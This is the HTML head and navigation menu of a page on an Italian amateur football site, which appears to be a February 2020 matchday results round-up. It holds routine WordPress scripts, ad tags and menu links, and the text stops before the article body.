<!DOCTYPE html>

<html class="no-js" lang="it-IT">

	<head profile="http://gmpg.org/xfn/11">
		
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
		<meta name="viewport" content="width=device-width, initial-scale=1.0" >
		 
		<title>SABATO UI, 6A GIORNATA DI RITORNO - Calcio Ui</title>
<script>document.documentElement.className = document.documentElement.className.replace("no-js","js");</script>

<!-- This site is optimized with the Yoast SEO plugin v12.4 - https://yoast.com/wordpress/plugins/seo/ -->
<meta name="description" content="Una doppietta di Matteo Testi e il derby va a La Serra. La Spicchiese vince in casa della capolista Cerreto e ora sono in tre a dividersi il primato."/>
<meta name="robots" content="max-snippet:-1, max-image-preview:large, max-video-preview:-1"/>
<link rel="canonical" href="http://www.calcioui.eu/2020/02/08/6a-di-ritorno/" />
<meta property="og:locale" content="it_IT" />
<meta property="og:type" content="article" />
<meta property="og:title" content="SABATO UI, 6A GIORNATA DI RITORNO - Calcio Ui" />
<meta property="og:description" content="Una doppietta di Matteo Testi e il derby va a La Serra. La Spicchiese vince in casa della capolista Cerreto e ora sono in tre a dividersi il primato." />
<meta property="og:url" content="http://www.calcioui.eu/2020/02/08/6a-di-ritorno/" />
<meta property="og:site_name" content="Calcio Ui" />
<meta property="article:publisher" content="https://www.facebook.com/calciouicalcioui" />
<meta property="article:tag" content="amatori empoli" />
<meta property="article:tag" content="AREA UI" />
<meta property="article:tag" content="CALCIO MAGGIORE" />
<meta property="article:tag" content="calcio ui" />
<meta property="article:tag" content="cdp limite" />
<meta property="article:tag" content="risultati del week-end" />
<meta property="article:tag" content="scalese" />
<meta property="article:section" content="NEWS" />
<meta property="article:published_time" content="2020-02-08T16:21:32+00:00" />
<meta property="article:modified_time" content="2020-02-08T17:15:08+00:00" />
<meta property="og:updated_time" content="2020-02-08T17:15:08+00:00" />
<meta property="og:image" content="https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2020/02/WhatsApp-Image-2020-02-08-at-14.34.33.jpeg?fit=1600%2C1200" />
<meta property="og:image:secure_url" content="https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2020/02/WhatsApp-Image-2020-02-08-at-14.34.33.jpeg?fit=1600%2C1200" />
<meta property="og:image:width" content="1600" />
<meta property="og:image:height" content="1200" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:description" content="Una doppietta di Matteo Testi e il derby va a La Serra. La Spicchiese vince in casa della capolista Cerreto e ora sono in tre a dividersi il primato." />
<meta name="twitter:title" content="SABATO UI, 6A GIORNATA DI RITORNO - Calcio Ui" />
<meta name="twitter:image" content="https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2020/02/WhatsApp-Image-2020-02-08-at-14.34.33.jpeg?fit=1600%2C1200" />
<script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"http://www.calcioui.eu/#organization","name":"calcio ui","url":"http://www.calcioui.eu/","sameAs":["https://www.facebook.com/calciouicalcioui"],"logo":{"@type":"ImageObject","@id":"http://www.calcioui.eu/#logo","url":"https://i2.wp.com/www.calcioui.eu/wp-content/uploads/2016/10/logo-ui-2016-1.png?fit=584%2C164","width":584,"height":164,"caption":"calcio ui"},"image":{"@id":"http://www.calcioui.eu/#logo"}},{"@type":"WebSite","@id":"http://www.calcioui.eu/#website","url":"http://www.calcioui.eu/","name":"Calcio Ui","publisher":{"@id":"http://www.calcioui.eu/#organization"},"potentialAction":{"@type":"SearchAction","target":"http://www.calcioui.eu/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"ImageObject","@id":"http://www.calcioui.eu/2020/02/08/6a-di-ritorno/#primaryimage","url":"https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2020/02/WhatsApp-Image-2020-02-08-at-14.34.33.jpeg?fit=1600%2C1200","width":1600,"height":1200},{"@type":"WebPage","@id":"http://www.calcioui.eu/2020/02/08/6a-di-ritorno/#webpage","url":"http://www.calcioui.eu/2020/02/08/6a-di-ritorno/","inLanguage":"it-IT","name":"SABATO UI, 6A GIORNATA DI RITORNO - Calcio Ui","isPartOf":{"@id":"http://www.calcioui.eu/#website"},"primaryImageOfPage":{"@id":"http://www.calcioui.eu/2020/02/08/6a-di-ritorno/#primaryimage"},"datePublished":"2020-02-08T16:21:32+00:00","dateModified":"2020-02-08T17:15:08+00:00","description":"Una doppietta di Matteo Testi e il derby va a La Serra. La Spicchiese vince in casa della capolista Cerreto e ora sono in tre a dividersi il primato."},{"@type":"Article","@id":"http://www.calcioui.eu/2020/02/08/6a-di-ritorno/#article","isPartOf":{"@id":"http://www.calcioui.eu/2020/02/08/6a-di-ritorno/#webpage"},"author":{"@id":"http://www.calcioui.eu/#/schema/person/2aa76548356109cb6dd58ceede1a6890"},"headline":"SABATO UI,  6A GIORNATA DI RITORNO","datePublished":"2020-02-08T16:21:32+00:00","dateModified":"2020-02-08T17:15:08+00:00","commentCount":0,"mainEntityOfPage":{"@id":"http://www.calcioui.eu/2020/02/08/6a-di-ritorno/#webpage"},"publisher":{"@id":"http://www.calcioui.eu/#organization"},"image":{"@id":"http://www.calcioui.eu/2020/02/08/6a-di-ritorno/#primaryimage"},"keywords":"amatori empoli,AREA UI,CALCIO MAGGIORE,calcio ui,cdp limite,risultati del week-end,scalese","articleSection":"NEWS"},{"@type":["Person"],"@id":"http://www.calcioui.eu/#/schema/person/2aa76548356109cb6dd58ceede1a6890","name":"admin","sameAs":[]}]}</script>
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//maps.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Calcio Ui &raquo; Feed" href="http://www.calcioui.eu/feed/" />
<link rel="alternate" type="application/rss+xml" title="Calcio Ui &raquo; Feed dei commenti" href="http://www.calcioui.eu/comments/feed/" />

<script>
var MP3jPLAYLISTS = [];
var MP3jPLAYERS = [];
</script>
<link rel="alternate" type="application/rss+xml" title="Calcio Ui &raquo; SABATO UI,  6A GIORNATA DI RITORNO Feed dei commenti" href="http://www.calcioui.eu/2020/02/08/6a-di-ritorno/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.calcioui.eu\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.13"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='scap.flashblock-css'  href='http://www.calcioui.eu/wp-content/plugins/compact-wp-audio-player/css/flashblock.css?ver=4.9.13' type='text/css' media='all' />
<link rel='stylesheet' id='scap.player-css'  href='http://www.calcioui.eu/wp-content/plugins/compact-wp-audio-player/css/player.css?ver=4.9.13' type='text/css' media='all' />
<link rel='stylesheet' id='mb.miniAudioPlayer.css-css'  href='http://www.calcioui.eu/wp-content/plugins/wp-miniaudioplayer/css/miniplayer.css?ver=1.9.3' type='text/css' media='screen' />
<link rel='stylesheet' id='slideshow-css'  href='http://www.calcioui.eu/wp-content/plugins/slideshow/slideshow.css?ver=0.1' type='text/css' media='all' />
<link rel='stylesheet' id='wp-post-ticker-css'  href='http://www.calcioui.eu/wp-content/plugins/wp-post-ticker/public/css/wp-post-ticker-public.css?ver=1.0.0' type='text/css' media='all' />
<link rel='stylesheet' id='wp-post-ticker-font-awesome-css'  href='http://www.calcioui.eu/wp-content/plugins/wp-post-ticker/public/css/font-awesome.min.css?ver=1.0.0' type='text/css' media='all' />
<link rel='stylesheet' id='google-maps-builder-plugin-styles-css'  href='http://www.calcioui.eu/wp-content/plugins/google-maps-builder/vendor/wordimpress/maps-builder-core/assets/css/google-maps-builder.min.css?ver=2.1.2' type='text/css' media='all' />
<link rel='stylesheet' id='google-maps-builder-map-icons-css'  href='http://www.calcioui.eu/wp-content/plugins/google-maps-builder/vendor/wordimpress/maps-builder-core/includes/libraries/map-icons/css/map-icons.css?ver=2.1.2' type='text/css' media='all' />
<link rel='stylesheet' id='recent-posts-widget-with-thumbnails-public-style-css'  href='http://www.calcioui.eu/wp-content/plugins/recent-posts-widget-with-thumbnails/public.css?ver=6.6.0' type='text/css' media='all' />
<link rel='stylesheet' id='social-logos-css'  href='https://c0.wp.com/p/jetpack/7.0.2/_inc/social-logos/social-logos.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='mp3-jplayer-css'  href='http://www.calcioui.eu/wp-content/plugins/mp3-jplayer/css/dark.css?ver=2.7.3' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='https://c0.wp.com/p/jetpack/7.0.2/css/jetpack.css' type='text/css' media='all' />
<link rel='stylesheet' id='rowling_google_fonts-css'  href='//fonts.googleapis.com/css?family=Lato%3A400%2C700%2C900%2C400italic%2C700italic%7CMerriweather%3A700%2C900%2C400italic&#038;ver=4.9.13' type='text/css' media='all' />
<link rel='stylesheet' id='rowling_fontawesome-css'  href='http://www.calcioui.eu/wp-content/themes/rowling/fa/css/font-awesome.css?ver=4.9.13' type='text/css' media='all' />
<link rel='stylesheet' id='rowling_style-css'  href='http://www.calcioui.eu/wp-content/themes/rowling/style.css?ver=4.9.13' type='text/css' media='all' />
<script type='text/javascript' src='http://www.calcioui.eu/wp-content/plugins/compact-wp-audio-player/js/soundmanager2-nodebug-jsmin.js?ver=4.9.13'></script>
<script type='text/javascript' src='https://c0.wp.com/c/4.9.13/wp-includes/js/jquery/jquery.js'></script>
<script type='text/javascript' src='https://c0.wp.com/c/4.9.13/wp-includes/js/jquery/jquery-migrate.min.js'></script>
<script type='text/javascript' src='http://www.calcioui.eu/wp-content/plugins/wp-miniaudioplayer/js/jquery.mb.miniAudioPlayer.min.js?ver=1.9.3'></script>
<script type='text/javascript' src='http://www.calcioui.eu/wp-content/plugins/wp-miniaudioplayer/js/map_overwrite_default_me.js?ver=1.9.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.0.2/_inc/build/related-posts/related-posts.min.js'></script>
<script type='text/javascript' src='http://www.calcioui.eu/wp-content/plugins/text-scrolling-widget/includes/js/scrolltext_custom.js?ver=4.9.13'></script>
<script type='text/javascript' src='https://c0.wp.com/c/4.9.13/wp-includes/js/jquery/ui/core.min.js'></script>
<script type='text/javascript' src='https://c0.wp.com/c/4.9.13/wp-includes/js/jquery/ui/effect.min.js'></script>
<script type='text/javascript' src='http://www.calcioui.eu/wp-content/plugins/wp-post-ticker/public/js/wp-post-ticker-public.js?ver=1.0.0'></script>
<script type='text/javascript' src='http://www.calcioui.eu/wp-content/themes/rowling/js/flexslider.js?ver=1'></script>
<script type='text/javascript' src='http://www.calcioui.eu/wp-content/themes/rowling/js/doubletaptogo.js?ver=1'></script>
<script type='text/javascript' src='https://maps.googleapis.com/maps/api/js?v=3.exp&#038;libraries=places&#038;ver=4.9.13'></script>
<link rel='https://api.w.org/' href='http://www.calcioui.eu/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.calcioui.eu/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.calcioui.eu/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.9.13" />
<link rel='shortlink' href='https://wp.me/p7LQDe-6nY' />
<link rel="alternate" type="application/json+oembed" href="http://www.calcioui.eu/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.calcioui.eu%2F2020%2F02%2F08%2F6a-di-ritorno%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://www.calcioui.eu/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.calcioui.eu%2F2020%2F02%2F08%2F6a-di-ritorno%2F&#038;format=xml" />

<!-- This site is using AdRotate v5.6 to display their advertisements - https://ajdg.solutions/products/adrotate-for-wordpress/ -->
<!-- AdRotate CSS -->
<style type="text/css" media="screen">
	.g { margin:0px; padding:0px; overflow:hidden; line-height:1; zoom:1; }
	.g img { height:auto; }
	.g-col { position:relative; float:left; }
	.g-col:first-child { margin-left: 0; }
	.g-col:last-child { margin-right: 0; }
	.g-2 { margin:0px 0px 0px 0px;width:100%; max-width:1200px; height:100%; max-height:90px; }
	.g-3 { margin:0px 0px 0px 0px;width:100%; max-width:728px; height:100%; max-height:90px; }
	.g-4 { margin:0px width:100%; max-width:728px; height:100%; max-height:90px; }
	.g-5 { margin:0px 0px 0px 0px;width:100%; max-width:1199px; height:100%; max-height:90px; }
	.g-6 { margin:0px 0px 0px 0px;width:100%; max-width:268px; height:100%; max-height:201px; }
	.g-7 { margin:0px 0px 0px 0px;width:100%; max-width:360px; height:100%; max-height:51px; }
	@media only screen and (max-width: 480px) {
		.g-col, .g-dyn, .g-single { width:100%; margin-left:0; margin-right:0; }
	}
</style>
<!-- /AdRotate CSS -->

<link type="text/css" rel="stylesheet" href="http://www.calcioui.eu/wp-content/plugins/category-specific-rss-feed-menu/wp_cat_rss_style.css" />
<!-- Quantcast Choice. Consent Manager Tag -->
<script type="text/javascript" async=true>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</script>
<!-- End Quantcast Choice. Consent Manager Tag -->
    <style>
        .qc-cmp-button.qc-cmp-secondary-button {
          border-color: #eee !important;
          background-color: #eee !important;
        }
    </style>
<!-- start miniAudioPlayer custom CSS -->

<style id="map_custom_css">
       /* DO NOT REMOVE OR MODIFY */
/*{'skinName': 'mySkin', 'borderRadius': 5, 'main': 'rgb(255, 217, 102)', 'secondary': 'rgb(68, 68, 68)', 'playerPadding': 0}*/
/* END - DO NOT REMOVE OR MODIFY */
/*++++++++++++++++++++++++++++++++++++++++++++++++++
Copyright (c) 2001-2014. Matteo Bicocchi (Pupunzi);
http://pupunzi.com/mb.components/mb.miniAudioPlayer/demo/skinMaker.html

Skin name: mySkin
borderRadius: 5
background: rgb(255, 217, 102)
icons: rgb(68, 68, 68)
border: rgb(55, 55, 55)
borderLeft: rgb(255, 230, 153)
borderRight: rgb(255, 204, 51)
mute: rgba(68, 68, 68, 0.4)
download: rgba(255, 217, 102, 0.4)
downloadHover: rgb(255, 217, 102)
++++++++++++++++++++++++++++++++++++++++++++++++++*/

/* Older browser (IE8) - not supporting rgba() */
.mbMiniPlayer.mySkin .playerTable span{background-color:#ffd966}
.mbMiniPlayer.mySkin .playerTable span.map_play{border-left:1px solid #ffd966;}
.mbMiniPlayer.mySkin .playerTable span.map_volume{border-right:1px solid #ffd966;}
.mbMiniPlayer.mySkin .playerTable span.map_volume.mute{color: #444444;}
.mbMiniPlayer.mySkin .map_download{color: #444444;}
.mbMiniPlayer.mySkin .map_download:hover{color: #444444;}
.mbMiniPlayer.mySkin .playerTable span{color: #444444;}
.mbMiniPlayer.mySkin .playerTable {border: 1px solid #444444 !important;}

/*++++++++++++++++++++++++++++++++++++++++++++++++*/

.mbMiniPlayer.mySkin .playerTable{background-color:transparent; border-radius:5px !important;}
.mbMiniPlayer.mySkin .playerTable span{background-color:rgb(255, 217, 102); padding:3px !important; font-size: 20px;}
.mbMiniPlayer.mySkin .playerTable span.map_time{ font-size: 12px !important; width: 50px !important}
.mbMiniPlayer.mySkin .playerTable span.map_title{ padding:4px !important}
.mbMiniPlayer.mySkin .playerTable span.map_play{border-left:1px solid rgb(255, 204, 51); border-radius:0 4px 4px 0 !important;}
.mbMiniPlayer.mySkin .playerTable span.map_volume{padding-left:6px !important}
.mbMiniPlayer.mySkin .playerTable span.map_volume{border-right:1px solid rgb(255, 230, 153); border-radius:4px 0 0 4px !important;}
.mbMiniPlayer.mySkin .playerTable span.map_volume.mute{color: rgba(68, 68, 68, 0.4);}
.mbMiniPlayer.mySkin .map_download{color: rgba(255, 217, 102, 0.4);}
.mbMiniPlayer.mySkin .map_download:hover{color: rgb(255, 217, 102);}
.mbMiniPlayer.mySkin .playerTable span{color: rgb(68, 68, 68);text-shadow: none!important;}
.mbMiniPlayer.mySkin .playerTable span{color: rgb(68, 68, 68);}
.mbMiniPlayer.mySkin .playerTable {border: 1px solid rgb(55, 55, 55) !important;}
.mbMiniPlayer.mySkin .playerTable span.map_title{color: #000; text-shadow:none!important}
.mbMiniPlayer.mySkin .playerTable .jp-load-bar{background-color:rgba(255, 217, 102, 0.3);}
.mbMiniPlayer.mySkin .playerTable .jp-play-bar{background-color:#ffd966;}
.mbMiniPlayer.mySkin .playerTable span.map_volumeLevel a{background-color:rgb(94, 94, 94); height:80%!important }
.mbMiniPlayer.mySkin .playerTable span.map_volumeLevel a.sel{background-color:#444444;}
.mbMiniPlayer.mySkin  span.map_download{font-size:50px !important;}
/* Wordpress playlist select */
.map_pl_container .pl_item.sel{background-color:#ffd966 !important; color: #444444}
/*++++++++++++++++++++++++++++++++++++++++++++++++*/figure.wp-block-audio{opacity: 0;}
       </style>
	
<!-- end miniAudioPlayer custom CSS -->	

<link rel='dns-prefetch' href='//v0.wordpress.com'/>
<link rel='dns-prefetch' href='//widgets.wp.com'/>
<link rel='dns-prefetch' href='//s0.wp.com'/>
<link rel='dns-prefetch' href='//0.gravatar.com'/>
<link rel='dns-prefetch' href='//1.gravatar.com'/>
<link rel='dns-prefetch' href='//2.gravatar.com'/>
<link rel='dns-prefetch' href='//i0.wp.com'/>
<link rel='dns-prefetch' href='//i1.wp.com'/>
<link rel='dns-prefetch' href='//i2.wp.com'/>
<link rel='dns-prefetch' href='//c0.wp.com'/>
<style type='text/css'>img#wpstats{display:none}</style><!-- Customizer CSS --><style type="text/css">body a { color:#0479e0; }body a:hover { color:#0479e0; }.blog-title a:hover { color:#0479e0; }.navigation .section-inner { background:#0479e0; }.primary-menu ul li:hover > a { color:#0479e0; }.search-container .search-button:hover { color:#0479e0; }.sticky .sticky-tag { background:#0479e0; }.sticky .sticky-tag:after { border-right-color:#0479e0; }.sticky .sticky-tag:after { border-left-color:#0479e0; }.post-categories { color:#0479e0; }.single .post-meta a { color:#0479e0; }.single .post-meta a:hover { border-bottom-color:#0479e0; }.single-post .post-image-caption .fa { color:#0479e0; }.related-post .category { color:#0479e0; }.post-content a { color:#0479e0; }.post-content a:hover { color:#0479e0; }.post-content a:hover { border-bottom-color:#0479e0; }.post-content p.intro { color:#0479e0; }.post-content blockquote:after { color:#0479e0; }.post-content fieldset legend { background:#0479e0; }.post-content input[type="submit"] { background:#0479e0; }.post-content input[type="button"] { background:#0479e0; }.post-content input[type="reset"] { background:#0479e0; }.post-content input[type="submit"]:hover { background:#0479e0; }.post-content input[type="button"]:hover { background:#0479e0; }.post-content input[type="reset"]:hover { background:#0479e0; }.post-content .has-accent-color { color:#0479e0; }.post-content .has-accent-background-color { background-color:#0479e0; }.page-edit-link { color:#0479e0; }.post-content .page-links a:hover { background:#0479e0; }.post-tags a:hover { background:#0479e0; }.post-tags a:hover:before { border-right-color:#0479e0; }.post-navigation h4 a:hover { color:#0479e0; }.no-comments .fa { color:#0479e0; }.comments-title-container .fa { color:#0479e0; }.comment-reply-title .fa { color:#0479e0; }.comments-title-link a { color:#0479e0; }.comments-title-link a:hover { border-bottom-color:#0479e0; }.comments .pingbacks li a:hover { color:#0479e0; }.comment-header h4 a { color:#0479e0; }.bypostauthor .comment-author-icon { background:#0479e0; }.form-submit #submit { background-color:#0479e0; }.comments-nav a:hover { color:#0479e0; }.pingbacks-title { border-bottom-color:#0479e0; }.page-title h4 { border-bottom-color:#0479e0; }.archive-nav a:hover { color:#0479e0; }.archive-nav a:hover { border-top-color:#0479e0; }.widget-title { border-bottom-color:#0479e0; }.widget-content .textwidget a:hover { color:#0479e0; }.widget_archive li a:hover { color:#0479e0; }.widget_categories li a:hover { color:#0479e0; }.widget_meta li a:hover { color:#0479e0; }.widget_nav_menu li a:hover { color:#0479e0; }.widget_rss .widget-content ul a.rsswidget:hover { color:#0479e0; }#wp-calendar thead th { color:#0479e0; }#wp-calendar tfoot a:hover { color:#0479e0; }.widget .tagcloud a:hover { background:#0479e0; }.widget .tagcloud a:hover:before { border-right-color:#0479e0; }.footer .widget .tagcloud a:hover { background:#0479e0; }.footer .widget .tagcloud a:hover:before { border-right-color:#0479e0; }.wrapper .search-button:hover { color:#0479e0; }.to-the-top { background:#0479e0; }.credits .copyright a:hover { color:#0479e0; }.nav-toggle { background-color:#0479e0; }.mobile-menu { background:#0479e0; }</style><!--/Customizer CSS--><link rel="icon" href="https://i2.wp.com/www.calcioui.eu/wp-content/uploads/2016/08/cropped-icona.png?fit=32%2C32" sizes="32x32" />
<link rel="icon" href="https://i2.wp.com/www.calcioui.eu/wp-content/uploads/2016/08/cropped-icona.png?fit=192%2C192" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="https://i2.wp.com/www.calcioui.eu/wp-content/uploads/2016/08/cropped-icona.png?fit=180%2C180" />
<meta name="msapplication-TileImage" content="https://i2.wp.com/www.calcioui.eu/wp-content/uploads/2016/08/cropped-icona.png?fit=270%2C270" />
			<style type="text/css" id="wp-custom-css">
				/*
Benvenuto nella funzione di personalizzazione dei CSS!

Per scoprire come funziona, consulta http://wp.me/PEmnE-Bt
*/
.body-link {
	position: fixed;
	left: 0;
	top: 0;
	height: 1080px;
	width: 100%;
	z-index: 0;			</style>
			
	</head>
	<script src="//d3u598arehftfk.cloudfront.net/prebid_hb_85_154.js"
async></script>
	
	<body class="post-template-default single single-post postid-24550 single-format-standard has-featured-image">
		
				
			<div class="top-nav">
				
				<div class="section-inner">
					
					<ul class="secondary-menu">
						
						<li id="menu-item-1630" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1630"><a href="http://www.calcioui.eu/albo-doro/">ALBO D&#8217;ORO</a></li>
<li id="menu-item-1637" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1637"><a href="http://www.calcioui.eu/pallone-doro/">PALLONE D&#8217;ORO</a></li>
<li id="menu-item-1072" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1072"><a>STAGIONE 2015/2016</a>
<ul class="sub-menu">
	<li id="menu-item-1074" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1074"><a>GIRONE A</a>
	<ul class="sub-menu">
		<li id="menu-item-1073" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1073"><a href="http://www.calcioui.eu/info/classifica/">CLASSIFICA</a></li>
		<li id="menu-item-1070" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1070"><a href="http://www.calcioui.eu/marcatori/">MARCATORI</a></li>
	</ul>
</li>
	<li id="menu-item-1075" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1075"><a>GIRONE B</a>
	<ul class="sub-menu">
		<li id="menu-item-1071" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1071"><a href="http://www.calcioui.eu/info/classifica/classifica/">CLASSIFICA</a></li>
		<li id="menu-item-1076" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1076"><a href="http://www.calcioui.eu/marcatori-girone-b-20152016/">MARCATORI</a></li>
	</ul>
</li>
	<li id="menu-item-1077" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1077"><a>GIRONE C</a>
	<ul class="sub-menu">
		<li id="menu-item-1079" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1079"><a href="http://www.calcioui.eu/classifica-girone-c-20152016/">CLASSIFICA</a></li>
		<li id="menu-item-1078" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1078"><a href="http://www.calcioui.eu/marcatori-girone-c-20152016/">MARCATORI</a></li>
	</ul>
</li>
	<li id="menu-item-1080" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1080"><a>GIRONE D</a>
	<ul class="sub-menu">
		<li id="menu-item-1082" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1082"><a href="http://www.calcioui.eu/classifica-girone-d-20152016/">CLASSIFICA</a></li>
		<li id="menu-item-1081" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1081"><a href="http://www.calcioui.eu/marcatori-girone-d-20152016/">MARCATORI</a></li>
	</ul>
</li>
	<li id="menu-item-1083" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1083"><a>GIRONE E</a>
	<ul class="sub-menu">
		<li id="menu-item-1085" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1085"><a href="http://www.calcioui.eu/classifica-girone-e-20152016/">CLASSIFICA</a></li>
		<li id="menu-item-1084" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1084"><a href="http://www.calcioui.eu/marcatori-girone-e-20152016/">MARCATORI</a></li>
	</ul>
</li>
	<li id="menu-item-1091" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1091"><a>BOLLETTINO</a>
	<ul class="sub-menu">
		<li id="menu-item-1093" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1093"><a href="http://www.calcioui.eu/comunicati-ufficiali-dalla-lega/">EMPOLI</a></li>
		<li id="menu-item-1092" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1092"><a href="http://www.calcioui.eu/comunicati-ufficiali-regionali-20152016/">REGIONALE</a></li>
	</ul>
</li>
</ul>
</li>
<li id="menu-item-8331" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8331"><a>STAGIONE 2016/2017</a>
<ul class="sub-menu">
	<li id="menu-item-8332" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8332"><a href="http://WWW.CALCIOUI.EU">GIRONE A</a>
	<ul class="sub-menu">
		<li id="menu-item-8333" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8333"><a href="http://www.calcioui.eu/139-2/">CALENDARIO</a></li>
		<li id="menu-item-8334" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8334"><a href="http://www.calcioui.eu/classifica-girone-20162017/">CLASSIFICA</a></li>
		<li id="menu-item-12135" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-12135"><a href="http://www.calcioui.eu/girone-a-20162017/">MARCATORI</a></li>
	</ul>
</li>
	<li id="menu-item-9693" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-9693"><a href="http://WWW.CALCIOUI.EU">GIRONE B</a>
	<ul class="sub-menu">
		<li id="menu-item-9694" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9694"><a href="http://www.calcioui.eu/calendario-girone-b/">CALENDARIO</a></li>
		<li id="menu-item-9695" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9695"><a href="http://www.calcioui.eu/classifica-girone-b-20162017/">CLASSIFICA</a></li>
		<li id="menu-item-12136" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-12136"><a href="http://www.calcioui.eu/girone-b-20162017/">MARCATORI</a></li>
	</ul>
</li>
	<li id="menu-item-9696" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-9696"><a href="http://WWW.CALCIOUI.EU">GIRONE C</a>
	<ul class="sub-menu">
		<li id="menu-item-9697" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9697"><a href="http://www.calcioui.eu/calendario-girone-c/">CALENDARIO</a></li>
		<li id="menu-item-9700" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9700"><a href="http://www.calcioui.eu/classifica-girone-c-20162017/">CLASSIFICA</a></li>
		<li id="menu-item-12137" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-12137"><a href="http://www.calcioui.eu/girone-c-20162017/">MARCATORI</a></li>
	</ul>
</li>
	<li id="menu-item-9707" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-9707"><a href="http://WWW.CALCIOUI.EU">GIRONE D</a>
